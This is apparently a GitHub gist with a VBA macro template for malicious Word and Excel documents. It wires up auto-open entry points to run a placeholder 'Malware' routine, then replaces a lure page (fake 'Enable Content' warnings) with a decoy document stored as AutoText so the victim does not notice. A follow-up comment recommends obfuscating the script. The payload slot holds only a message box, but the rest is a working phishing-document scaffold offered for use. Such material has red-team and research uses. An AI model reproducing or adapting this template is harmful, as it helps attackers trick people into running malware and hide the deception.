Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ).
Public alreadyLaunched As Integer
Private Sub Malware()
' ============================================
' Enter here your malware code here.
' It will be started on auto open surely.
' ============================================
MsgBox ("Here comes the malware!")
' ============================================
End Sub
Private Sub Launch()
If alreadyLaunched = True Then
Exit Sub
End If
alreadyLaunched = True
End Sub
Private Sub SubstitutePage()
' This routine will take the entire Document's contents,
' delete them and insert in their place contents defined in
' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
Dim doc As Word.Document
Dim firstPageRange As Range
Dim rng As Range
Dim autoTextTemplateName As String
' This is the name of the defined AutoText prepared in the document,
' to be inserted in place of previous contents.
autoTextTemplateName = "RealDoc"
Set firstPageRange = Word.ActiveDocument.Range
Selection.Delete Unit:=wdCharacter, Count:=1
Set doc = ActiveDocument
Set rng = doc.Sections(1).Range
doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
End Sub
Sub AutoOpen()
' Becomes launched as first on MS Word
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
End Sub
Sub Auto_Open()
' Becomes launched as first on MS Excel
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
End Sub
Copy link

mgeeky commented Aug 21, 2017

It will be a good idea to feed some Visual Basic obfuscation tool with this script (like the one of mine's: VisualBasicObfuscator).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment